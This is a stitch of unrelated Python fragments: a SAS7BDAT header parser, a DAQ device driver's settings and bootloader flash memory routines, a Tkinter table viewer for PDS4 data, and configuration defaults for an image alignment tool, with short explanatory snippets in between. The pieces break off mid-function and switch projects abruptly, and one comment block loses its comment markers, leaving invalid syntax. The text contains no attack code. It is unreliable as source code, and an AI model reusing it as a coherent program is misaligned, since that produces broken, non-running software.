FILE_TYPE_OFFSET = 156
FILE_TYPE_LENGTH = 8
DATE_CREATED_OFFSET = 164
DATE_CREATED_LENGTH = 8
DATE_MODIFIED_OFFSET = 172
DATE_MODIFIED_LENGTH = 8
HEADER_SIZE_OFFSET = 196
HEADER_SIZE_LENGTH = 4
PAGE_SIZE_OFFSET = 200
PAGE_SIZE_LENGTH = 4
PAGE_COUNT_OFFSET = 204
PAGE_COUNT_LENGTH = 4
SAS_RELEASE_OFFSET = 216
SAS_RELEASE_LENGTH = 8
SAS_SERVER_TYPE_OFFSET = 224
SAS_SERVER_TYPE_LENGTH = 16
OS_VERSION_NUMBER_OFFSET = 240
OS_VERSION_NUMBER_LENGTH = 16
OS_MAKER_OFFSET = 256
OS_MAKER_LENGTH = 16
OS_NAME_OFFSET = 272
OS_NAME_LENGTH = 16
PAGE_BIT_OFFSET_X86 = 16
PAGE_BIT_OFFSET_X64 = 32
SUBHEADER_POINTER_LENGTH_X86 = 12
SUBHEADER_POINTER_LENGTH_X64 = 24
PAGE_TYPE_OFFSET = 0
PAGE_TYPE_LENGTH = 2
BLOCK_COUNT_OFFSET = 2
BLOCK_COUNT_LENGTH = 2
SUBHEADER_COUNT_OFFSET = 4
SUBHEADER_COUNT_LENGTH = 2
PAGE_META_TYPE = 0
PAGE_DATA_TYPE = 256
PAGE_MIX_TYPE = [512, 640]
PAGE_AMD_TYPE = 1024
PAGE_METC_TYPE = 16384
PAGE_COMP_TYPE = -28672
PAGE_MIX_DATA_TYPE = PAGE_MIX_TYPE + [PAGE_DATA_TYPE]
PAGE_META_MIX_AMD = [PAGE_META_TYPE] + PAGE_MIX_TYPE + [PAGE_AMD_TYPE]
PAGE_ANY = PAGE_META_MIX_AMD +\
[PAGE_DATA_TYPE, PAGE_METC_TYPE, PAGE_COMP_TYPE]
SUBHEADER_POINTERS_OFFSET = 8
TRUNCATED_SUBHEADER_ID = 1
COMPRESSED_SUBHEADER_ID = 4
COMPRESSED_SUBHEADER_TYPE = 1
def __init__(self, parent):
self.parent = parent
self.properties = SASProperties()
self.properties.filename = os.path.basename(parent.path)
# Check magic number
h = parent.cached_page = parent._file.read(288)
if len(h) < 288:
parent.logger.error('header too short (not a sas7bdat file?)')
return
if not self.check_magic_number(h):
parent.logger.error('magic number mismatch')
return
align1 = 0
align2 = 0
offsets_and_lengths = {
self.ALIGN_1_OFFSET: self.ALIGN_1_LENGTH,
self.ALIGN_2_OFFSET: self.ALIGN_2_LENGTH,
}
align_vals = parent._read_bytes(offsets_and_lengths)
if align_vals[self.ALIGN_1_OFFSET] == self.U64_BYTE_CHECKER_VALUE:
align2 = self.ALIGN_2_VALUE
self.properties.u64 = True
if align_vals[self.ALIGN_2_OFFSET] == self.ALIGN_1_CHECKER_VALUE:
align1 = self.ALIGN_1_VALUE
total_align = align1 + align2
offsets_and_lengths = {
self.ENDIANNESS_OFFSET: self.ENDIANNESS_LENGTH,
self.PLATFORM_OFFSET: self.PLATFORM_LENGTH,
self.DATASET_OFFSET: self.DATASET_LENGTH,
self.FILE_TYPE_OFFSET: self.FILE_TYPE_LENGTH,
self.DATE_CREATED_OFFSET + align1: self.DATE_CREATED_LENGTH,
self.DATE_MODIFIED_OFFSET + align1: self.DATE_MODIFIED_LENGTH,
self.HEADER_SIZE_OFFSET + align1: self.HEADER_SIZE_LENGTH,
self.PAGE_SIZE_OFFSET + align1: self.PAGE_SIZE_LENGTH,
self.PAGE_COUNT_OFFSET + align1: self.PAGE_COUNT_LENGTH + align2,
self.SAS_RELEASE_OFFSET + total_align: self.SAS_RELEASE_LENGTH,
self.SAS_SERVER_TYPE_OFFSET + total_align:
self.SAS_SERVER_TYPE_LENGTH,
self.OS_VERSION_NUMBER_OFFSET + total_align:
self.OS_VERSION_NUMBER_LENGTH,
self.OS_MAKER_OFFSET + total_align: self.OS_MAKER_LENGTH,
self.OS_NAME_OFFSET + total_align: self.OS_NAME_LENGTH,
}
vals = parent._read_bytes(offsets_and_lengths)
self.properties.endianess = 'little'\
if vals[self.ENDIANNESS_OFFSET] == b'\x01' else 'big'
parent.endianess = self.properties.endianess
if vals[self.PLATFORM_OFFSET] == b'1':
self.properties.platform = 'unix'
elif vals[self.PLATFORM_OFFSET] == b'2':
self.properties.platform = 'windows'
else:
self.properties.platform = 'unknown'
self.properties.name = parent._read_val(
's', vals[self.DATASET_OFFSET], self.DATASET_LENGTH
)
self.properties.file_type = parent._read_val(
's', vals[self.FILE_TYPE_OFFSET], self.FILE_TYPE_LENGTH
)
if (count > 512 or address > 0x1ff):
return False
dataCount = 4
replyCount = count
result = False
s_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+dataCount) # send buffer
r_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+replyCount) # reply buffer
s_buffer[MSG_INDEX_COMMAND] = self.CMD_SETTINGS_MEMORY_R
s_buffer[MSG_INDEX_DATA] = address & 0xff
s_buffer[MSG_INDEX_DATA+1] = (address>>8) & 0xff
s_buffer[MSG_INDEX_DATA+2] = count & 0xff
s_buffer[MSG_INDEX_DATA+3] = (count>>8) & 0xff
s_buffer[MSG_INDEX_START] = MSG_START
s_buffer[MSG_INDEX_FRAME] = self.device.frameID
self.device.frameID = (self.device.frameID + 1) % 256 # increment frame ID with every send
s_buffer[MSG_INDEX_STATUS] = 0
s_buffer[MSG_INDEX_COUNT_LOW] = (dataCount & 0xff)
s_buffer[MSG_INDEX_COUNT_HIGH] = ((dataCount>>8) & 0xff)
s_buffer[MSG_INDEX_DATA+dataCount] = 0xff - self.device.calcChecksum(s_buffer, MSG_INDEX_DATA+dataCount)
self.device.sock.settimeout(.1)
self.device.sendMessage(s_buffer)
try:
r_buffer = self.device.sock.recv(1024)
except socket.timeout:
raise TimeoutError('SettingsMemory_R: timeout error.')
if len(r_buffer) == MSG_HEADER_SIZE + MSG_CHECKSUM_SIZE + replyCount:
if r_buffer[MSG_INDEX_START] == s_buffer[0] and \
r_buffer[MSG_INDEX_COMMAND] == s_buffer[MSG_INDEX_COMMAND] | MSG_REPLY and \
r_buffer[MSG_INDEX_FRAME] == s_buffer[2] and \
r_buffer[MSG_INDEX_STATUS] == MSG_SUCCESS and \
r_buffer[MSG_INDEX_COUNT_LOW] == replyCount & 0xff and \
r_buffer[MSG_INDEX_COUNT_HIGH] == (replyCount >> 8) & 0xff and \
r_buffer[MSG_INDEX_DATA+replyCount] + self.device.calcChecksum(r_buffer,(MSG_HEADER_SIZE+replyCount)) == 0xff :
result = True
value = int.from_bytes(r_buffer[MSG_INDEX_DATA:MSG_INDEX_DATA+replyCount], byteorder='little')
try:
if (result == False):
raise ResultError
except ResultError:
print('Error in SettingsMemory_R E-1608. Status =', hex(r_buffer[MSG_INDEX_STATUS]))
return -1
return value
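The frame layout used by these commands can be exercised in isolation. The driver's calcChecksum() is not shown in this chunk, so the 8-bit additive sum below is an assumption, as is the MSG_HEADER_SIZE value; the complement check mirrors the receive-side test `data + checksum == 0xff` used above.

```python
def calc_checksum(buf, count):
    # Assumed: simple 8-bit additive sum over the first `count` bytes.
    return sum(buf[:count]) & 0xff

MSG_HEADER_SIZE = 6           # hypothetical header size for this sketch
address, count = 0x0100, 16
frame = bytearray(MSG_HEADER_SIZE)                       # zeroed header
frame += bytes([address & 0xff, (address >> 8) & 0xff,   # little-endian address
                count & 0xff, (count >> 8) & 0xff])      # little-endian count
frame.append(0xff - calc_checksum(frame, len(frame)))    # complement checksum

# Receiver-side validation, as in the reply checks above.
assert frame[-1] + calc_checksum(frame, len(frame) - 1) == 0xff
```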
def SettingsMemory_W(self, address, count, data):
"""
This command writes to the nonvolatile settings memory. The settings memory
is 512 bytes (address 0 - 0x1ff). The amount of data to be
written is inferred from the frame count - 2. The maximum that
can be written in one transfer is 512 bytes. The settings will
be implemented after a device reset.
"""
if (count > 512 or address > 0x1ff):
return False
dataCount = count + 2
replyCount = 0
result = False
s_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+dataCount) # send buffer
r_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+replyCount) # reply buffer
s_buffer[MSG_INDEX_COMMAND] = self.CMD_SETTINGS_MEMORY_W
s_buffer[MSG_INDEX_DATA] = address & 0xff
s_buffer[MSG_INDEX_DATA+1] = (address>>8) & 0xff
for i in range(count):
s_buffer[MSG_INDEX_DATA+2+i] = data[i]
s_buffer[MSG_INDEX_START] = MSG_START
s_buffer[MSG_INDEX_FRAME] = self.device.frameID
self.device.frameID = (self.device.frameID + 1) % 256 # increment frame ID with every send
s_buffer[MSG_INDEX_STATUS] = 0
s_buffer[MSG_INDEX_COUNT_LOW] = (dataCount & 0xff)
s_buffer[MSG_INDEX_COUNT_HIGH] = ((dataCount>>8) & 0xff)
s_buffer[MSG_INDEX_DATA+dataCount] = 0xff - self.device.calcChecksum(s_buffer, MSG_INDEX_DATA+dataCount)
self.device.sock.settimeout(.1)
self.device.sendMessage(s_buffer)
try:
r_buffer = self.device.sock.recv(1024)
except socket.timeout:
raise TimeoutError('SettingsMemory_W: timeout error.')
if len(r_buffer) == MSG_HEADER_SIZE + MSG_CHECKSUM_SIZE + replyCount:
if r_buffer[MSG_INDEX_START] == s_buffer[0] and \
r_buffer[MSG_INDEX_COMMAND] == s_buffer[MSG_INDEX_COMMAND] | MSG_REPLY and \
r_buffer[MSG_INDEX_FRAME] == s_buffer[2] and \
r_buffer[MSG_INDEX_STATUS] == MSG_SUCCESS and \
r_buffer[MSG_INDEX_COUNT_LOW] == replyCount & 0xff and \
r_buffer[MSG_INDEX_COUNT_HIGH] == (replyCount >> 8) & 0xff and \
r_buffer[MSG_INDEX_DATA+replyCount] + self.device.calcChecksum(r_buffer,(MSG_HEADER_SIZE+replyCount)) == 0xff :
result = True
try:
if (result == False):
raise ResultError
except ResultError:
print('Error in SettingsMemory_W E-1608. Status =', hex(r_buffer[MSG_INDEX_STATUS]))
def BootloaderMemory_R(self, address, count):
"""
This command reads the bootloader stored in nonvolatile FLASH
memory. The bootloader is located in program FLASH memory in two
physical address ranges: 0x1D000000 - 0x1D007FFF for bootloader
code and 0x1FC00000 - 0x1FC01FFF for C startup code and
interrupts. Reads may be performed at any time.
address: the start address for reading (see above)
count: the number of bytes to read (max 512)
"""
if (count > 512):
return False
dataCount = 4
replyCount = count
result = False
s_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+dataCount) # send buffer
r_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+replyCount) # reply buffer
s_buffer[MSG_INDEX_COMMAND] = self.CMD_BOOT_MEMORY_R
s_buffer[MSG_INDEX_DATA] = address & 0xff
s_buffer[MSG_INDEX_DATA+1] = (address>>8) & 0xff
s_buffer[MSG_INDEX_DATA+2] = count & 0xff
s_buffer[MSG_INDEX_DATA+3] = (count>>8) & 0xff
s_buffer[MSG_INDEX_START] = MSG_START
s_buffer[MSG_INDEX_FRAME] = self.device.frameID
self.device.frameID = (self.device.frameID + 1) % 256 # increment frame ID with every send
s_buffer[MSG_INDEX_STATUS] = 0
s_buffer[MSG_INDEX_COUNT_LOW] = (dataCount & 0xff)
s_buffer[MSG_INDEX_COUNT_HIGH] = ((dataCount>>8) & 0xff)
s_buffer[MSG_INDEX_DATA+dataCount] = 0xff - self.device.calcChecksum(s_buffer, MSG_INDEX_DATA+dataCount)
self.device.sock.settimeout(.1)
self.device.sendMessage(s_buffer)
try:
r_buffer = self.device.sock.recv(1024)
except socket.timeout:
raise TimeoutError('BootloaderMemory_R: timeout error.')
if len(r_buffer) == MSG_HEADER_SIZE + MSG_CHECKSUM_SIZE + replyCount:
if r_buffer[MSG_INDEX_START] == s_buffer[0] and \
r_buffer[MSG_INDEX_COMMAND] == s_buffer[MSG_INDEX_COMMAND] | MSG_REPLY and \
r_buffer[MSG_INDEX_FRAME] == s_buffer[2] and \
r_buffer[MSG_INDEX_STATUS] == MSG_SUCCESS and \
r_buffer[MSG_INDEX_COUNT_LOW] == replyCount & 0xff and \
r_buffer[MSG_INDEX_COUNT_HIGH] == (replyCount >> 8) & 0xff and \
r_buffer[MSG_INDEX_DATA+replyCount] + self.device.calcChecksum(r_buffer,(MSG_HEADER_SIZE+replyCount)) == 0xff :
result = True
value = int.from_bytes(r_buffer[MSG_INDEX_DATA:MSG_INDEX_DATA+replyCount], byteorder='little')
try:
if (result == False):
raise ResultError
except ResultError:
print('Error in BootloaderMemory_R E-1608. Status =', hex(r_buffer[MSG_INDEX_STATUS]))
return -1
return value
def BootloaderMemory_W(self, address, count, data):
"""This command writes the bootloader stored in nonvolatile FLASH
memory. The bootloader is located in program FLASH memory in two
physical address ranges: 0x1D000000 - 0x1D007FFF for bootloader
code and 0x1FC00000 - 0x1FC01FFF for C startup code and
interrupts. Writes outside these ranges are ignored. The
bootloader memory is write protected and must be unlocked in
order to write the memory. The unlock procedure is to write the
unlock code 0xAA55 to address 0xFFFFFFFE. Writes to the entire
memory range are then possible. Write any other value to address
0xFFFFFFFE to lock the memory after writing.
The FLASH memory must be erased prior to programming. A bulk
erase is performed by writing 0xAA55 to address 0x80000000 after
unlocking the memory for write. The bulk erase will require
approximately 150ms to complete. Once the erase is complete, the
memory may be written; however, the device will not be able to
boot unless it has a valid bootloader, so the device should not be
reset until the bootloader is completely written and verified
using BootloaderMemory_R().
The writes are performed on 4-byte boundaries internally and it is
recommended that the output data be sent in the same manner. The
amount of data to be written is inferred from the frame
count - 2.
"""
if (count > 512):
return False
dataCount = count + 2
replyCount = 0
result = False
s_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+dataCount) # send buffer
r_buffer = bytearray(MSG_HEADER_SIZE+MSG_CHECKSUM_SIZE+replyCount) # reply buffer
s_buffer[MSG_INDEX_COMMAND] = self.CMD_BOOT_MEMORY_W
s_buffer[MSG_INDEX_DATA] = address & 0xff
s_buffer[MSG_INDEX_DATA+1] = (address>>8) & 0xff
for i in range(count):
s_buffer[MSG_INDEX_DATA+2+i] = data[i]
s_buffer[MSG_INDEX_START] = MSG_START
s_buffer[MSG_INDEX_FRAME] = self.device.frameID
self.device.frameID = (self.device.frameID + 1) % 256 # increment frame ID with every send
s_buffer[MSG_INDEX_STATUS] = 0
s_buffer[MSG_INDEX_COUNT_LOW] = (dataCount & 0xff)
s_buffer[MSG_INDEX_COUNT_HIGH] = ((dataCount>>8) & 0xff)
s_buffer[MSG_INDEX_DATA+dataCount] = 0xff - self.device.calcChecksum(s_buffer, MSG_INDEX_DATA+dataCount)
self.device.sock.settimeout(.1)
self.device.sendMessage(s_buffer)
try:
r_buffer = self.device.sock.recv(1024)
except socket.timeout:
raise TimeoutError('BootloaderMemory_W: timeout error.')
if len(r_buffer) == MSG_HEADER_SIZE + MSG_CHECKSUM_SIZE + replyCount:
if r_buffer[MSG_INDEX_START] == s_buffer[0] and \
r_buffer[MSG_INDEX_COMMAND] == s_buffer[MSG_INDEX_COMMAND] | MSG_REPLY and \
r_buffer[MSG_INDEX_FRAME] == s_buffer[2] and \
r_buffer[MSG_INDEX_STATUS] == MSG_SUCCESS and \
r_buffer[MSG_INDEX_COUNT_LOW] == replyCount & 0xff and \
r_buffer[MSG_INDEX_COUNT_HIGH] == (replyCount >> 8) & 0xff and \
r_buffer[MSG_INDEX_DATA+replyCount] + self.device.calcChecksum(r_buffer,(MSG_HEADER_SIZE+replyCount)) == 0xff :
result = True
try:
if (result == False):
raise ResultError
except ResultError:
print('Error in BootloaderMemory_W E-1608. Status =', hex(r_buffer[MSG_INDEX_STATUS]))
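The unlock/erase/program/lock sequence described in the docstring can be encoded as data. This is a sketch of the ordering only, not driver code; the magic addresses 0xFFFFFFFE and 0x80000000 and the unlock code 0xAA55 are taken from the description above.

```python
def bootloader_write_plan(start_address, chunks):
    # Ordered (address, payload) operations implied by the docstring.
    ops = [(0xFFFFFFFE, 0xAA55),      # unlock write protection
           (0x80000000, 0xAA55)]      # bulk erase (~150 ms)
    addr = start_address
    for chunk in chunks:
        ops.append((addr, chunk))     # program on 4-byte boundaries
        addr += len(chunk)
    ops.append((0xFFFFFFFE, 0x0000))  # any other value re-locks the memory
    return ops

plan = bootloader_write_plan(0x1D000000, [b'\x01\x02\x03\x04'])
assert plan[0] == (0xFFFFFFFE, 0xAA55)
assert plan[2] == (0x1D000000, b'\x01\x02\x03\x04')
assert plan[-1] == (0xFFFFFFFE, 0x0000)
```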
def getMFGCAL(self):
"""
get the manufacturers calibration data (timestamp) from the
Calibration memory
"""
# get the year (since 2000)
address = 0x50
data ,= unpack('B', self.CalMemory_R(address, 1))
year = 2000+data
# get the month
address = 0x51
month ,= unpack('B', self.CalMemory_R(address, 1))
# get the day
address = 0x52
day ,= unpack('B', self.CalMemory_R(address, 1))
# get the hour
address = 0x53
hour ,= unpack('B', self.CalMemory_R(address, 1))
# get the minute
address = 0x54
minute ,= unpack('B', self.CalMemory_R(address, 1))
# get the second
address = 0x55
second ,= unpack('B', self.CalMemory_R(address, 1))
mdate = datetime(year, month, day, hour, minute, second)
return mdate
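The byte layout read above (one byte each at 0x50-0x55: year-since-2000, month, day, hour, minute, second) can be exercised without a device; the calibration bytes here are made up.

```python
from datetime import datetime
from struct import unpack

cal = bytes([23, 7, 14, 9, 30, 5])   # hypothetical contents of 0x50..0x55
year = 2000 + unpack('B', cal[0:1])[0]
stamp = datetime(year, cal[1], cal[2], cal[3], cal[4], cal[5])
assert stamp == datetime(2023, 7, 14, 9, 30, 5)
```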
def MACaddress(self):
"""
Gets the MAC address
"""
# get the lowest three bytes of the MAC address
address = 0x1fd
value = self.CalMemory_R(address, 3)
self.device.MAC = ((0x00802f) << 24) + (value[0]<<16) + (value[1]<<8) + value[2]
return self.device.MAC
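The assembly above fixes the top 24 bits to the OUI 0x00802F and takes the low three bytes from calibration memory; a standalone sketch with made-up bytes:

```python
def mac_from_cal(low3):
    # OUI 0x00802F in the top 24 bits, low three bytes from cal memory.
    return (0x00802f << 24) + (low3[0] << 16) + (low3[1] << 8) + low3[2]

mac = mac_from_cal(b'\x12\x34\x56')
assert mac == 0x00802F123456
assert '%012x' % mac == '00802f123456'
```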
@staticmethod
def volts(value, gain):
# converts raw values to volts
if gain == BP_10V:
volt = (value - 0x8000)*10.0/32768
elif gain == BP_5V:
volt = (value - 0x8000)*5.0/32768
elif gain == BP_2V:
volt = (value - 0x8000)*2.0/32768
elif gain == BP_1V:
volt = (value - 0x8000)*1.0/32768
else:
raise ValueError('volts: unknown gain.')
return volt
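The conversion is plain offset-binary scaling; the BP_10V branch in isolation:

```python
def volts_bp10(raw):
    # 16-bit offset-binary code to volts over a +/-10 V span.
    return (raw - 0x8000) * 10.0 / 32768

assert volts_bp10(0x8000) == 0.0     # mid-scale -> 0 V
assert volts_bp10(0xC000) == 5.0     # three-quarter scale -> +5 V
assert volts_bp10(0x0000) == -10.0   # zero code -> negative full scale
```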
@staticmethod
def valueAOut(volts):
# converts volts to a 16 bit raw value for +/- 10V output
if (volts >= 10.0):
return 0xffff  # clamp at positive full scale
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import platform
import binascii
import functools
import numpy as np
from math import ceil, floor
from .core import DataViewWindow, Window
from .widgets.tooltip import ToolTip
from .widgets.tree import TreeView
from ..reader.table_objects import TableStructure, Meta_Field
from ..reader.data import PDS_array
from ..utils.helpers import is_array_like
from ..utils.logging import logger_init
from ..extern import six
from ..extern.six.moves.tkinter import (Menu, Frame, Text, Label, Entry, Button, Scrollbar,
BooleanVar, TclError)
# Initialize the logger
logger = logger_init()
#################################
class TabularViewWindow(DataViewWindow):
""" Window that displays PDS4 Table data structures as tables.
This window will display tabular data. After creating it, you should use the load_table() method to load
the table that it needs to display.
"""
def __init__(self, viewer):
# Create basic data view window
super(TabularViewWindow, self).__init__(viewer)
# Will be set to the fields for the table structure
self.data = None
# Pack the display frame, which contains the scrollbars and the scrollable canvas
self._display_frame.pack(side='left', anchor='nw', expand=1, fill='both')
# The window_resize binding adds/removes rows and columns onto the screen based on window size
self._canvas.bind('<Configure>', self._window_resize)
# Add notify event for scroll wheel (used to scroll table via scroll wheel)
self._bind_scroll_event(self._mousewheel_scroll)
# Menu option variables. These are TKinter type wrappers around standard Python variables. The
# advantage is that you can use trace(func) on them, to call func whenever one of these variables
# is changed
menu_options = [{'name': 'display_data_as_formatted', 'type': BooleanVar(), 'default': True,
'trace': lambda *args: self._update_vertical_table_display(self._vert_scrollbar.get())}]
for option in menu_options:
var = option['type']
self._menu_options[option['name']] = var
self._add_trace(var, 'w', option['trace'], option['default'])
# These variables are used to store widgets, and info about them, used for displaying tabular data
self._data_boxes = []
self._background_boxes = []
self._deleted_boxes = []
# Loads the table structure into this window and displays it for the user
def load_table(self, table_structure):
# Set a title for the window
self.set_window_title("{0} - Table '{1}'".format(self.get_window_title(), table_structure.id))
# Set necessary instance variables for this DataViewWindow
self.structure = table_structure
self.data = self.structure.fields
self.meta_data = table_structure.meta_data if hasattr(table_structure, 'meta_data') else None
self._settings = {'num_rows': len(self.data[0]), 'num_columns': len(self.data),
'num_display_rows': 0, 'display_start_row': 0,
'num_display_cols': 0, 'display_start_col': 0}
# Add vertical scrollbar for the table
self._vert_scrollbar = Scrollbar(self._display_frame, orient='vertical', command=self._vertical_scroll)
self._vert_scrollbar.pack(side='right', fill='y')
# Add horizontal scrollbar for the table
self._horz_scrollbar = Scrollbar(self._display_frame, orient='horizontal', command=self._horizontal_scroll)
self._horz_scrollbar.pack(side='bottom', fill='x')
# Pack the static canvas, which contains the scrollable canvas
self._static_canvas.pack(side='left', anchor='nw', expand=1, fill='both')
# Pack the scrollable canvas, which contains the table itself
self._scrollable_canvas.pack(expand=1, fill='both')
# Create row count label on left
box = Frame(self._scrollable_canvas, height=20, width=50)
box.grid(row=0, column=0, pady=(10, 6), padx=14)
label = Label(box, text='Row #', font=self.get_font(size=8), bd=0)
label.pack(fill='both', expand=2)
# Adds new menu options used for manipulating the data
self._add_menus()
# Mark table as open, simulate window resizing to populate the window with the table's data
self._data_open = True
self._widget.update_idletasks()
self._window_resize(None)
# Sets 'display_data_as_formatted' menu_option to either display_data_as_formatted or display it as
# unformatted. Updates the on-screen values.
def set_display_data_format(self, formatted=True):
self._menu_options['display_data_as_formatted'].set(formatted)
self._update_vertical_table_display(self._vert_scrollbar.get())
# Adds menu options used for manipulating the data display
def _add_menus(self):
# Add an Options menu
options_menu = self._add_menu('Options', in_menu='main', index=2)
# Add a Data Formatting sub-menu to the Options menu
formatting_menu = self._add_menu('Data formatting', in_menu='Options')
formatting_menu.add_checkbutton(label='Use field format', onvalue=True, offvalue=False,
variable=self._menu_options['display_data_as_formatted'])
formatting_menu.add_checkbutton(label='Ignore field format', onvalue=False, offvalue=True,
variable=self._menu_options['display_data_as_formatted'])
# Add a View menu
self._add_view_menu()
# Draws the data from self.data on the screen by adding the appropriate widgets
#
# draw_row and draw_col are dictionaries with 'start' and 'stop' values, indicating the physical location
# of the rows and columns that should be added to the screen. The exception being a row start value of -1,
# which indicates that the row to add contains the 'column names' header (top row), and a column value
# of -1 which indicates that the column to add contains the 'row count' (left most column). data_row_offset
# and data_col_offset are used to indicate the difference between the physical location of the row/column
# in the table displayed on the screen and the row/column of the data variable that should be used as to
# pull the value for that physical location (e.g. get_data_point(row + data_row_offset, col + data_col_offset),
# where row is a value between draw_row's 'start' and 'stop' values) and similar for col).
def _draw_data(self, draw_row, draw_col, data_row_offset=0, data_col_offset=0):
# Create column names
if draw_row['start'] == -1:
for column in range(draw_col['start'], draw_col['stop']):
box = Frame(self._scrollable_canvas, height=20)
box.grid(row=0, column=column + 1, padx=6, pady=(10, 4))
interior_box = Frame(box, height=18, width=126)
interior_box.pack()
interior_box.pack_propagate(False)
column_name_idx = column + data_col_offset
column_name = self.data[column_name_idx].meta_data.full_name(skip_parents=True)
entry = Entry(interior_box, bd=0, highlightthickness=0, font=self.get_font(9, 'bold'),
cursor='arrow')
entry.insert(0, column_name)
entry.configure(state='readonly')
entry.pack(fill='both', expand=2)
self._background_boxes.append({'box': box, 'row': -1, 'col': column})
self._data_boxes.append({'entry': entry, 'row': -1, 'col': column})
FieldDefinitionToolTip(self, entry, column)
# Create row numbers
if draw_col['start'] == -1:
for row in range(draw_row['start'], draw_row['stop']):
border_box = Frame(self._scrollable_canvas, height=20, width=50, background='black')
border_box.grid(row=row + 1, column=0, padx=6, pady=2)
interior_box = Frame(border_box, height=18, width=48, background='white')
interior_box.pack(fill='both', expand=2, padx=1, pady=1)
interior_box.pack_propagate(False)
data_row = row + data_row_offset
entry = Entry(interior_box, bd=0, highlightthickness=0, readonlybackground='white', justify='center')
entry.insert(0, data_row)
entry.configure(state='readonly')
entry.pack(fill='both', expand=2, padx=4)
self._background_boxes.append({'box': border_box, 'row': row, 'col': -1})
self._data_boxes.append({'entry': entry, 'row': row, 'col': -1})
# Create values
for column in range(draw_col['start'], draw_col['stop']):
for row in range(draw_row['start'], draw_row['stop']):
border_box = Frame(self._scrollable_canvas, height=20, width=130, background='black')
border_box.grid(row=row + 1, column=column + 1, padx=4, pady=2)
interior_box = Frame(border_box, height=18, width=128, background='white')
interior_box.pack(fill='both', expand=2, padx=1, pady=1)
interior_box.pack_propagate(False)
data_row = row + data_row_offset
data_column = column + data_col_offset
entry = Entry(interior_box, bd=0, highlightthickness=0, readonlybackground='white')
open_table = Button(interior_box, text='Table', font=self.get_font(weight='bold'))
data_box = {'entry': entry, 'open_table': open_table, 'row': row, 'col': column}
self._set_data_point_widget(data_row, data_column, data_box)
entry.configure(state='readonly')
self._background_boxes.append({'box': border_box, 'row': row, 'col': column})
self._data_boxes.append(data_box)
# Erases the appropriate widgets from the screen
#
# erase_row and erase_col are dictionaries with 'start' and 'stop' values, indicating the physical
# location of the rows and columns that should be removed from the table being displayed on the screen
def _erase_data(self, erase_row, erase_col):
# Obtain indices of background boxes (which contain the entries, which contain the data point values)
# that need to be deleted
remove_bg_box_idxs = [i for i, data_box in enumerate(self._data_boxes)
if erase_row['start'] <= data_box['row'] <= erase_row['stop']
if erase_col['start'] <= data_box['col'] <= erase_col['stop']]
# Remove data boxes that are being deleted from being tracked
self._data_boxes = [data_box
for i, data_box in enumerate(self._data_boxes) if i not in remove_bg_box_idxs]
# Remove the background boxes that need to be deleted from the screen
deleted_boxes = []
for i in range(0, len(remove_bg_box_idxs)):
box = self._background_boxes[remove_bg_box_idxs[i]]
deleted_boxes.append(box)
box['box'].grid_forget()
# Ideally we could use .destroy() in the above method, instead of .grid_forget(). However, at least
# on Windows, calling destroy() seems to lead TK to call the widget's (Toplevel) size configure
# and tell it to stay the same size as it was when window was initially grabbed to start resizing
# (therefore the window is immediately resized back to its original size when you make it smaller.)
# Instead we simply hide the boxes above and delete them only if we have built up too many
boxes, and only after waiting 5s (destroying boxes immediately happens while the user is still
resizing, so the window snaps back to its pre-drag size, which is jarring). Note
# that the window may temporarily freeze during deletion. Think and test carefully if adjusting
# this code.
def destroy_boxes(boxes):
for i in range(len(boxes) - 1, -1, -1):
boxes[i]['box'].destroy()
boxes.remove(boxes[i])
self._deleted_boxes += deleted_boxes
if len(self._deleted_boxes) > 750:
self._widget.after(5000, lambda *args: destroy_boxes(self._deleted_boxes))
# Remove the background boxes that were deleted from being tracked
for box in deleted_boxes:
self._background_boxes.remove(box)
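The index selection at the top of this method (where the double-`if` comprehension is equivalent to an `and`) can be sketched on toy data:

```python
def boxes_in_range(boxes, erase_row, erase_col):
    # Indices of boxes whose row AND column fall inside both ranges.
    return [i for i, b in enumerate(boxes)
            if erase_row['start'] <= b['row'] <= erase_row['stop']
            and erase_col['start'] <= b['col'] <= erase_col['stop']]

boxes = [{'row': r, 'col': c} for r in range(3) for c in range(3)]
idx = boxes_in_range(boxes, {'start': 1, 'stop': 2}, {'start': 0, 'stop': 1})
assert idx == [3, 4, 6, 7]   # rows 1-2, columns 0-1
```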
# Adjusts the widget controlling what is displayed for the row and column indices specified to be the
# contents of data_box. Note that row and column specify the data row and column, the physical location
# on the screen is data_box[row] and data_box[col]
def _set_data_point_widget(self, row, column, data_box):
field = self.data[column]
data_point = field[row]
meta_data = field.meta_data
# Handle case where the data point is itself array-like (e.g. a nested table)
u"peaksigTriMat": True,
u"translations":True, u"pixRegError":True,
u"CTFDiag":True, u"logisticWeights": True, u"FRC": True,
u'Transparent': True, u'plot_dpi':144, u'image_dpi':250,
u'image_cmap':u'gray', u'graph_cmap':u'gnuplot',
u'fontsize':12, u'fontstyle': u'serif', u'colorbar': True,
u'backend': u'Qt4Agg', u'multiprocess':True,
u'show':False }
pass
def initDefaultFiles( self, stackName ):
self.files[u'stack'] = stackName
self.files[u'config'] = stackName + u".zor"
stackPath, stackFront = os.path.split( stackName )
stackFront = os.path.splitext( stackFront )[0]
if not 'compressor' in self.files or not bool(self.files['compressor']):
mrcExt = ".mrc"
mrcsExt = ".mrcs"
else:
mrcExt = ".mrcz"
mrcsExt = ".mrcsz"
self.files[u'align'] = os.path.relpath(
os.path.join( u"./align", "%s_zorro_movie%s" %(stackFront, mrcsExt) ),
start=stackPath )
self.files[u'sum'] = os.path.relpath(
os.path.join( u"./sum", "%s_zorro%s" %(stackFront, mrcExt) ),
start=stackPath )
self.files[u'figurePath'] = os.path.relpath(
os.path.join(stackPath, u"./figs"), start=stackPath )
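The path derivations above rely on os.path.relpath(path, start), which rewrites path relative to start; a quick check with a made-up layout:

```python
import os

# A sibling directory seen from 'data' needs one '..' hop.
rel = os.path.relpath(os.path.join('align', 'movie_zorro.mrcs'), start='data')
assert rel == os.path.join('..', 'align', 'movie_zorro.mrcs')
```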
def xcorr2_mc2_1( self, gpu_id = 0, loadResult=True, clean=True ):
"""
